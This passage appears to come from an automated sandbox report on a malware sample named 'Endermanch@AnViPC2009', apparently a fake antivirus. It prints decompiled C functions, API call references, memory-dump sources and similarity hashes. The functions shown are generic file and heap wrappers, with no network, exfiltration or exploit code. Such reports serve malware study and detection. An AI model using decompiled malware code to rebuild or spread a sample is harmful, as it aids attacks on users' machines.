                                                                                                                                                      			}








                                                                                                                                                      0x00404ef7
                                                                                                                                                      0x00404efd
                                                                                                                                                      0x00404eff
                                                                                                                                                      0x00404f07
                                                                                                                                                      0x00404f0d
                                                                                                                                                      0x00404f68
                                                                                                                                                      0x00404f68
                                                                                                                                                      0x00404f72
                                                                                                                                                      0x00404f72
                                                                                                                                                      0x00404f13
                                                                                                                                                      0x00404f4d
                                                                                                                                                      0x00404f4d
                                                                                                                                                      0x00404f53
                                                                                                                                                      0x00404f5a
                                                                                                                                                      0x00404f63
                                                                                                                                                      0x00404f63
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404f53
                                                                                                                                                      0x00404f16
                                                                                                                                                      0x00404f21
                                                                                                                                                      0x00404f23
                                                                                                                                                      0x00404f25
                                                                                                                                                      0x00404f30
                                                                                                                                                      0x00404f32
                                                                                                                                                      0x00404f3b
                                                                                                                                                      0x00404f41
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404f43
                                                                                                                                                      0x00404f45
                                                                                                                                                      0x00404f45
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00404f25
                                                                                                                                                      0x00404f01
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,00405470,?,?,?,00403273,?,00414C7C,0040335C,00000002,?,00404FE5,?), ref: 00404F16
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                      • String ID: |LA
                                                                                                                                                      • API String ID: 2591292051-4290591017
                                                                                                                                                      • Opcode ID: 22b8e8dd7a63493917274eee478992e32a9c10f4052c926a8568ea6d1c1fdc34
                                                                                                                                                      • Instruction ID: 75f987ff7a3b60ce8806b5479b3f433f77470b0d56a0be8814ff0b77dda38433
                                                                                                                                                      • Opcode Fuzzy Hash: 22b8e8dd7a63493917274eee478992e32a9c10f4052c926a8568ea6d1c1fdc34
                                                                                                                                                      • Instruction Fuzzy Hash: F601B5F00527029FE730AA34A4483A377D497D6326F01477FD2E2932D0D77898458B48
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040519F(void* __ecx, CHAR* _a4, WCHAR* _a8, struct _SECURITY_ATTRIBUTES* _a12) {
                                                                                                                                                      				void* _t22;
                                                                                                                                                      				void* _t23;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				WCHAR* _t36;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      
                                                                                                                                                      				_t34 = __ecx;
                                                                                                                                                      				_t37 = __ecx;
                                                                                                                                                      				if(_a12 != 0) {
                                                                                                                                                      					L2:
                                                                                                                                                      					_a12 = 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					_a12 = 0;
                                                                                                                                                      					if( *((intOrPtr*)(__ecx + 0x16)) != 0) {
                                                                                                                                                      						goto L2;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t22 = E00406E67();
                                                                                                                                                      				_t36 = _a8;
                                                                                                                                                      				if(_t22 == 0 || _t36 == 0 ||  *_t36 == 0) {
                                                                                                                                                      					_t23 = CreateFileA(_a4, 0xc0000000, _a12, 0, 2, 0, 0); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t23 = CreateFileW(_t36, 0xc0000000, _a12, 0, 2, 0, 0);
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t37 + 4) = _t23;
                                                                                                                                                      				 *((char*)(_t37 + 0x12)) = 1;
                                                                                                                                                      				 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                                                                                                                                      				 *((char*)(_t37 + 0x10)) = 0;
                                                                                                                                                      				if(_t36 == 0) {
                                                                                                                                                      					 *((short*)(_t37 + 0x418)) = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					E0040E40C(_t37 + 0x418, _t36);
                                                                                                                                                      				}
                                                                                                                                                      				_t25 = _t37 + 0x17;
                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                      					E0040E1E9(_t34, _t36, _t25, 0x1000000);
                                                                                                                                                      				} else {
                                                                                                                                                      					E0040A450(_t25, _a4);
                                                                                                                                                      				}
                                                                                                                                                      				E00404ECE(_t37,  *(_t37 + 4));
                                                                                                                                                      				return 0 |  *(_t37 + 4) != 0xffffffff;
                                                                                                                                                      			}








                                                                                                                                                      0x0040519f
                                                                                                                                                      0x004051a7
                                                                                                                                                      0x004051ac
                                                                                                                                                      0x004051b6
                                                                                                                                                      0x004051b6
                                                                                                                                                      0x004051ae
                                                                                                                                                      0x004051ae
                                                                                                                                                      0x004051b4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004051b4
                                                                                                                                                      0x004051bd
                                                                                                                                                      0x004051c2
                                                                                                                                                      0x004051c7
                                                                                                                                                      0x004051f8
                                                                                                                                                      0x004051d2
                                                                                                                                                      0x004051e0
                                                                                                                                                      0x004051e0
                                                                                                                                                      0x004051fe
                                                                                                                                                      0x00405201
                                                                                                                                                      0x00405205
                                                                                                                                                      0x00405208
                                                                                                                                                      0x0040520d
                                                                                                                                                      0x00405220
                                                                                                                                                      0x0040520f
                                                                                                                                                      0x00405217
                                                                                                                                                      0x00405217
                                                                                                                                                      0x00405227
                                                                                                                                                      0x0040522d
                                                                                                                                                      0x00405241
                                                                                                                                                      0x0040522f
                                                                                                                                                      0x00405233
                                                                                                                                                      0x00405233
                                                                                                                                                      0x0040524b
                                                                                                                                                      0x0040525d

                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000000,00000000,?,00000045,00000001,?,00404E7A,00000045,?,00000001,00000045), ref: 004051E0
                                                                                                                                                      • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000000,00000000,?,00000045,00000001,?,00404E7A,00000045,?,00000001,00000045), ref: 004051F8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: 0d6396ab3b67e2853f9f8080bc5c8414b68da011a796fbf291a3adc955f5eee7
                                                                                                                                                      • Instruction ID: deeb4ad8d62f16f56031398c2aa8362e229db7bd82372a129a01627aac88fa72
                                                                                                                                                      • Opcode Fuzzy Hash: 0d6396ab3b67e2853f9f8080bc5c8414b68da011a796fbf291a3adc955f5eee7
                                                                                                                                                      • Instruction Fuzzy Hash: F621A171400749BFEB209F618C85BAB7AACEF00748F04893FF551A6281C7789D549BA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E00405318(void* __ecx, long _a4, long _a8, signed int _a12) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      				long _t19;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				void* _t23;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				long _t28;
                                                                                                                                                      				long _t31;
                                                                                                                                                      
                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t25 = __ecx;
                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
                                                                                                                                                      					L12:
                                                                                                                                                      					_t15 = 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t28 = _a8;
                                                                                                                                                      					_t31 = _t28;
                                                                                                                                                      					if(_t31 <= 0 && (_t31 < 0 || _a4 < 0) && _a12 != 0) {
                                                                                                                                                      						if(_a12 != 1) {
                                                                                                                                                      							_t21 = E00405511(_t22, _t23, __eflags);
                                                                                                                                                      						} else {
                                                                                                                                                      							_t21 = E00404FA3(_t22, _t23);
                                                                                                                                                      						}
                                                                                                                                                      						_a4 = _a4 + _t21;
                                                                                                                                                      						asm("adc esi, edx");
                                                                                                                                                      						_a12 = _a12 & 0x00000000;
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = _t28;
                                                                                                                                                      					_t19 = SetFilePointer( *(_t25 + 4), _a4,  &_v8, _a12); // executed
                                                                                                                                                      					if(_t19 != 0xffffffff || GetLastError() == 0) {
                                                                                                                                                      						goto L12;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t15 = 0;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t15;
                                                                                                                                                      			}











                                                                                                                                                      0x00405318
                                                                                                                                                      0x0040531b
                                                                                                                                                      0x0040531d
                                                                                                                                                      0x00405323
                                                                                                                                                      0x00405385
                                                                                                                                                      0x00405385
                                                                                                                                                      0x00405325
                                                                                                                                                      0x00405326
                                                                                                                                                      0x00405329
                                                                                                                                                      0x0040532b
                                                                                                                                                      0x0040533f
                                                                                                                                                      0x00405348
                                                                                                                                                      0x00405341
                                                                                                                                                      0x00405341
                                                                                                                                                      0x00405341
                                                                                                                                                      0x0040534d
                                                                                                                                                      0x00405350
                                                                                                                                                      0x00405352
                                                                                                                                                      0x00405352
                                                                                                                                                      0x00405365
                                                                                                                                                      0x0040536b
                                                                                                                                                      0x00405375
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405381
                                                                                                                                                      0x00405381
                                                                                                                                                      0x00405381
                                                                                                                                                      0x00405375
                                                                                                                                                      0x00405389

                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(?,000000FF,?,?,?,00000000,?,?,004054C8,?,?,?,?,004093F5,000000FF), ref: 0040536B
                                                                                                                                                      • GetLastError.KERNEL32(004054C8,?,?,?,?,004093F5,000000FF,?,00000000,00000000,?,00000000,00000001,00000000,00000000,?), ref: 00405377
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                      • Opcode ID: 1df87da965669094af9f9845c50d8cd1b0aa35af952414ae821a42156fa9e51f
                                                                                                                                                      • Instruction ID: 45d997bd5926ea14948b1ac93e807db85fb2d556c696fc190fe1d5546c33b5cf
                                                                                                                                                      • Opcode Fuzzy Hash: 1df87da965669094af9f9845c50d8cd1b0aa35af952414ae821a42156fa9e51f
                                                                                                                                                      • Instruction Fuzzy Hash: 3A018871400B15EBCF249E5488096AB7B68EB003A4F14823AAC20A22D0D3B89951DE99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040572E(void* __eflags, CHAR* _a4, WCHAR* _a8) {
                                                                                                                                                      				long _t6;
                                                                                                                                                      				WCHAR* _t8;
                                                                                                                                                      
                                                                                                                                                      				if(E00406E67() == 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					_t6 = GetFileAttributesA(_a4); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t8 = _a8;
                                                                                                                                                      					if(_t8 == 0 ||  *_t8 == 0) {
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t6 = GetFileAttributesW(_t8);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return 0 | _t6 != 0xffffffff;
                                                                                                                                                      			}





                                                                                                                                                      0x00405735
                                                                                                                                                      0x0040574e
                                                                                                                                                      0x00405752
                                                                                                                                                      0x00405737
                                                                                                                                                      0x00405737
                                                                                                                                                      0x0040573d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405745
                                                                                                                                                      0x00405746
                                                                                                                                                      0x00405746
                                                                                                                                                      0x0040573d
                                                                                                                                                      0x00405762

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00404CD9,00000045,?,?,?,?), ref: 00405746
                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00404CD9,00000045,?,?,?,?), ref: 00405752
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile$Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3849939888-0
                                                                                                                                                      • Opcode ID: 111406815e8c2ee0db7041cba53e319ac68f9b3faee72a1c88eb85058d491332
                                                                                                                                                      • Instruction ID: eb631a914b25ddd8909624fbd9df007cea65af498cf4008e77b11e06c5ce248e
                                                                                                                                                      • Opcode Fuzzy Hash: 111406815e8c2ee0db7041cba53e319ac68f9b3faee72a1c88eb85058d491332
                                                                                                                                                      • Instruction Fuzzy Hash: 63D01234100A01D7CA155B30CD8855F76A8AF01360F158536B816E71F0D778C891FF1A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004057AA(void* __eflags, CHAR* _a4, WCHAR* _a8, long _a12) {
                                                                                                                                                      				signed int _t8;
                                                                                                                                                      				WCHAR* _t10;
                                                                                                                                                      
                                                                                                                                                      				if(E00406E67() == 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					_t8 = SetFileAttributesA(_a4, _a12); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t10 = _a8;
                                                                                                                                                      					if(_t10 == 0 ||  *_t10 == 0) {
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t8 = SetFileAttributesW(_t10, _a12);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t8 & 0xffffff00 | _t8 != 0x00000000;
                                                                                                                                                      			}





                                                                                                                                                      0x004057b1
                                                                                                                                                      0x004057ce
                                                                                                                                                      0x004057d6
                                                                                                                                                      0x004057b3
                                                                                                                                                      0x004057b3
                                                                                                                                                      0x004057b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004057c1
                                                                                                                                                      0x004057c6
                                                                                                                                                      0x004057c6
                                                                                                                                                      0x004057b9
                                                                                                                                                      0x004057e1

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000400,004058A0,00000000,00000400,00000000,?,00405976,00000400,00000002,00000001,00000000), ref: 004057C6
                                                                                                                                                      • SetFileAttributesA.KERNELBASE(00000000,00000400,004058A0,00000000,00000400,00000000,?,00405976,00000400,00000002,00000001,00000000), ref: 004057D6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile$Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3849939888-0
                                                                                                                                                      • Opcode ID: 3935861823abb7121fd462879b350d5c08bffbeff4f1789f28dc769748e00011
                                                                                                                                                      • Instruction ID: 0b9cdd8040df12358fa06a3d6c311d73c462f82f8aafaaca66aaa64a5c2fd96d
                                                                                                                                                      • Opcode Fuzzy Hash: 3935861823abb7121fd462879b350d5c08bffbeff4f1789f28dc769748e00011
                                                                                                                                                      • Instruction Fuzzy Hash: EFE0B634204B01EADA165B21CA44A1B7BB9EB40740F04842AB949E21F0D778C860EA19
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405828(void* __eflags, CHAR* _a4, WCHAR* _a8) {
                                                                                                                                                      				signed int _t6;
                                                                                                                                                      				WCHAR* _t8;
                                                                                                                                                      
                                                                                                                                                      				if(E00406E67() == 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					_t6 = DeleteFileA(_a4); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t8 = _a8;
                                                                                                                                                      					if(_t8 == 0 ||  *_t8 == 0) {
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t6 = DeleteFileW(_t8);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t6 & 0xffffff00 | _t6 != 0x00000000;
                                                                                                                                                      			}





                                                                                                                                                      0x0040582f
                                                                                                                                                      0x00405848
                                                                                                                                                      0x0040584c
                                                                                                                                                      0x00405831
                                                                                                                                                      0x00405831
                                                                                                                                                      0x00405837
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040583f
                                                                                                                                                      0x00405840
                                                                                                                                                      0x00405840
                                                                                                                                                      0x00405837
                                                                                                                                                      0x00405857

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                      • DeleteFileW.KERNEL32(?,00404FA1,-00000017,00000418,00000000,00405469,?,?,?,00403273,?,00414C7C,0040335C,00000002,?,00404FE5), ref: 00405840
                                                                                                                                                      • DeleteFileA.KERNELBASE(00000000,00404FA1,-00000017,00000418,00000000,00405469,?,?,?,00403273,?,00414C7C,0040335C,00000002,?,00404FE5), ref: 0040584C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DeleteFile$Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3886669992-0
                                                                                                                                                      • Opcode ID: ce812f0baf4e3e4d30c85a143babd511dbf4f467b4817d52f4db514373571f8a
                                                                                                                                                      • Instruction ID: 4c1d8aa06d631447778ad2f0079c9dac918b9598f82bd8cb4cac1e65896924ae
                                                                                                                                                      • Opcode Fuzzy Hash: ce812f0baf4e3e4d30c85a143babd511dbf4f467b4817d52f4db514373571f8a
                                                                                                                                                      • Instruction Fuzzy Hash: 33D0172160460196DA113B21CA48A1B2AA8EB40340B08C03ABC01F11E0DB78CCB0EE29
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040A1DE(void* _a4) {
                                                                                                                                                      				void* _t3;
                                                                                                                                                      				char _t5;
                                                                                                                                                      
                                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                                      					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                      					return _t5;
                                                                                                                                                      				}
                                                                                                                                                      				return _t3;
                                                                                                                                                      			}





                                                                                                                                                      0x0040a1e5
                                                                                                                                                      0x0040a1f3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a1f3
                                                                                                                                                      0x0040a1fa

                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,0040DCAE,00000000,00000000,00402B67,?,00000000,00402C4D), ref: 0040A1EC
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,0040DCAE,00000000,00000000,00402B67,?,00000000,00402C4D), ref: 0040A1F3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                      • Opcode ID: 1b78dc34d96e9a725593af20b36eac71c5368e07aec29259156ac954563b159f
                                                                                                                                                      • Instruction ID: a82ff6b0785c3664831f762f5a4916162d8ebcb88197ec6847833ee3145ea3a6
                                                                                                                                                      • Opcode Fuzzy Hash: 1b78dc34d96e9a725593af20b36eac71c5368e07aec29259156ac954563b159f
                                                                                                                                                      • Instruction Fuzzy Hash: 56C01235000208ABC7101B90D90CBD53E599708302F008021B708840A0C6B441B0D69E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040A1C5(long _a4) {
                                                                                                                                                      				void* _t3;
                                                                                                                                                      
                                                                                                                                                      				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                      				return _t3;
                                                                                                                                                      			}




                                                                                                                                                      0x0040a1d4
                                                                                                                                                      0x0040a1db

                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,0040A64C,?,?,00402B95), ref: 0040A1CD
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,0040A64C,?,?,00402B95), ref: 0040A1D4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                                      • Opcode ID: 74236f5c7da168fb3ace1d47c58c672c3213b8dd958d6a0e7c8abee1cd3c7f39
                                                                                                                                                      • Instruction ID: 7a16409088186048d9048875d39c01f0395119e9692a071e2e70866dbb263e04
                                                                                                                                                      • Opcode Fuzzy Hash: 74236f5c7da168fb3ace1d47c58c672c3213b8dd958d6a0e7c8abee1cd3c7f39
                                                                                                                                                      • Instruction Fuzzy Hash: 35C04C76044208A7C6105BD1AD09B857E1EE718651F008121F70585050C6B15120D66E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040303B(struct HWND__* _a4, int _a8, signed char _a12) {
                                                                                                                                                      				int _t6;
                                                                                                                                                      
                                                                                                                                                      				_t6 = EnableWindow(GetDlgItem(_a4, _a8), _a12 & 0x000000ff); // executed
                                                                                                                                                      				return _t6;
                                                                                                                                                      			}




                                                                                                                                                      0x00403050
                                                                                                                                                      0x00403056

                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 00403049
                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00403050
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
